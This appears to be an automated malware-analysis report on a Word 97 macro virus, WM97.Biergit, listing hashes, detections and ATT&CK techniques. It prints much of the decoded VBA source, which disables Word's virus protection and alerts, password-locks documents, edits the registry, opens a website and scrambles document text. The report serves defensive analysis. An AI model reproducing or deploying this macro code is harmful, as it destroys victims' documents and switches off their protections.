Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fcbeb2c813179db3…

MALICIOUS

Office (OLE)

Size: 73.0 KB
Created: 1999-06-15 11:50:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b173a42fff3d05818f2555e9b40ddf1d
SHA-1: 00c111bd6a57dc767e77b80346c0124a9d47cbae
SHA-256: fcbeb2c813179db3bde6b0161e80d2e9e2425c32d44bc3e2c3bf79edd1e202b6
Risk score: 142

Malware Insights

MITRE ATT&CK:
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic auto-execution markers and VBA macros, indicating an attempt to run malicious code upon opening. The script explicitly mentions 'Macro Virii Terror Kit' and 'WM97.BIERGIT', suggesting a known malware family, though specific attribution is uncertain. The embedded URL http://www.birgit.de is likely used to download additional malicious content.

Heuristics (5)

  • ClamAV: Doc.Trojan.Biergit-1 (severity: critical; tag: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Biergit-1
  • VBA macros detected (severity: medium; 1 related finding; tag: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; tag: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; tag: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; tag: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL: http://www.birgit.de (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 60642 bytes
SHA-256: a50f5cf4fa2595c762cf1521def5128eba57d2f3dcf9bb739db1b6a79868f7ef

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BIERGIT"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub LuAhJh5203()

    ' -= [zWeiBLuM´s Macro Virii Terror Kit] =-
    ' -= [WM97.BIERGIT] =-

    ' -= [ID: 18601-Gm-28815203-Tg.W] =-

KhCzCsNqApChJoFkHm = PmEoQwPvLlVuBnBkSg & ItPkRnQqNnLlBkRzUj2904685
On Error Resume Next
NkMyAuQwCeLvEvQxVj = RpSoMeDqFlAqVjAkRl & JqBeNoQxQjKfLzHjIf17853943
WordBasic.DisableAutoMacros 0
VfFrKgHnRqAmSvJmNy = MeVqDrNpLsAkSkAiSz & EjItDwMkGiUwIsCoDl34453489
ActiveDocument.ReadOnlyRecommended = False
BjQqHjKtUeJeNgUzFv = OhNqVvCkFsBgRgViSh & FgQnAwMrKeTqSlNuNh49412747
With Application
EmFpFlNeAoRsInIrSs = QkFqQzMeUsCyPxUjRm & GzBiSxNxNwSkGfDeCy64362005
.EnableCancelKey = wdCancelDisabled
MhTiPtEqPeGjAnBgKk = MvJrIqAeEzDsMzThSz & BrJxIiJkDvGfDtUjTi80961551
.DisplayAlerts = wdAlertsNone
PlIhNwGxSpPxRuMtCh = NyBrDuLuUzEoLuShRi & CoQrFjJrGrFvNnJpHe9592809
End With
BfBwBiTnLfEpJuEiQw = JmEtRlVuEkEiIwSfSw & ThCkQrFeSqPqKfEtCk1253355
With Options
DjMvVlAuNpNhEfPvHt = LpStMpKoTkFeHrRfSe & UeKfNrGkAmOkVvQeMg27489612
.ConfirmConversions = False
GnAuSnDePzVvVmEnVq = NtKtHtUjNkGwFnQfRj & VxRvKsGrDiMfJpFkBy42448870
.VirusProtection = False
OhPnHvQrJpKmNmTyNi = IhNvVkIiTrGqCoQzSw & QpDoVzCePhBwGhAoSi59048416
End With
QlEmEySxLeTeItIpFg = KkFvQoTzNqHmBkPeRf & RnKiSeCkTzAqQxMuGe73997674
Randomize
DgTfPkJoEqIrAtAeSu = GvIwIeHySxHgUlPySt & NfSyImVtIyKlNpHzBk90597221
If Int((Rnd * 10) + 1) = 10 Then
FjHeMmMuHeRkReLrKr = IyAwDiRtMxIyShOySx & OyDsEmVeMuJfBjSjMg5566478
MsgBox "BIERGIT", vbOkOnly, "BIERGIT"
HlJkBqKhGpMiPnKxAg = FeFvHnTuLrTuUvCmVj & TsQxCfEfDqJmHjDoMv451661
ActiveDocument.Password = "Birgit"
PgByMyBuVfBvHnCmNv = ApIxVeHtQyTpSwBkAx & PlCrOmAoOpUhDyUtHf61769606
ActiveDocument.SaveAs ActiveDocument.FullName
SjMyJfDeBpKoCuNzFs = CsAxQiSoKyUlQsAkVf & QiJlLnAuSlSxOrKzSx76728864
Application.Caption = "Birgit"
EeFqTnQrQfVfRuGoTk = UhDyIvGnQjUfNtAiBt & LwReAuThIkHsKkFhNh93328410
Application.Username = "Birgit"
HhQpRpTxTpItLfQfLh = AkRyDzQiKjVxMpViAy & MtCuTvToLgFnVzQnBz8287668
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Birgit"
PyIiFyKoMfTkEfJrCv = RuVeRqEhQqArJqVgBp & HmKoIgPxBfQiSsLsSj24887214
ActiveDocument.FollowHyperlink Address:="http://www.birgit.de", NewWindow:=False, AddHistory:=True
RgThDeNuOpFyVmUiQt = TxNeMuPyJqBnHmUgAu & IjRiFhPhFyPyGlByGf39846472
Dim a As Variant
UjIhBhPfReOqQtJvIq = VfFeHyDtDqCiGhThVy & JgDyCiQoIuNsQfMiRx54795730
Dim b As Variant
GeBvLpGrKqDiItBkAi = RpIgVoNsJxCzDiTfAq & EuLrNpMxUtCnNtHnMh71395276
Selection.Wholestory
JiLuIrJyMeMwDeMxNf = SsAgQsCnCwDvBeSfAv & FrSlKqMiBpAhBnTtAz86354534
a = Selection
RyEnTeAoFqBnReFmFu = OhDhIjMmIhDpVfRzBm & AkEfAxIrNoLyUfOxRj2964080
For i = 1 To Len(a)
TgPmQgDvIeJfMlQeTr = QkRhDnAhChElTxQzAr & BhLvSyJxRkJsIvDiFe17913338
b = Mid$(a, i, 1)
AkEmOjFfKpStHsFrLo = SnJhVrLxShFgStPzVv & CeTpPzJiUgImToPoQw32872596
c = Asc(Mid$(a, i, 1))
IeSeCrSsDfHkVrTgCg = NyMjMiVxBoFxPuPxAn & TsEiFkFrKfShPhKsLg49472143
d = c + 29
KiHzAtVyGpQzQzItQz = PfEjImJrRoGtNqOxAs & UqMyBlFxOxRxEwVyVy64431401
If d > 199 Then c = 30
TzAsKgMpVfFqIyAiIs = LqIlVzTrBvHnKrOvBj & QiUsNsCkDwGsBpQhQi8102947
e$ = e$ + Chr(d)
VgLrIiPvBpNiDjLwAp = NtAlQhIlRvIjJnNwAo & RfFmKtCrHsEnLiGnEe9598205
Next i
CkArFkSgDeAwUqAnNm = PwOlMlSgKvJeHiMwVs & RyMgGuCxKoDhVyRtPw10959462
Selection.Wholestory
KfOjQtIsTqLnMqPyFe = KlRmDxGfQgJvEjMuAk & NrUvSfUkAnNySrMyKg27559008
Selection.Cut
MiDjNvLzVeUfHxEpTx = MoJnVfRwKgKrDfLuAp & OoGqPgVrEjMsGkCiUy42508266
WordBasic.Insert e$
VzSxBhCpOqJsVxSeLq = IyMoMsFvQmKlAgKsBg & JgNjEnRePiAnDzTnPi59107812
With Selection.Find
BhGwVkFwReSlQiHsCn = JgEoIwPqJmLhVyJsAl & KzVzBoRlTeVhNsItEe74067070
.Text = "Bier"
DkRwTmIgTpEzLpSjQk = LjSoDeEkDmMyTuItVp & LwGtUpSrBwUxCmUzOw8
... (truncated)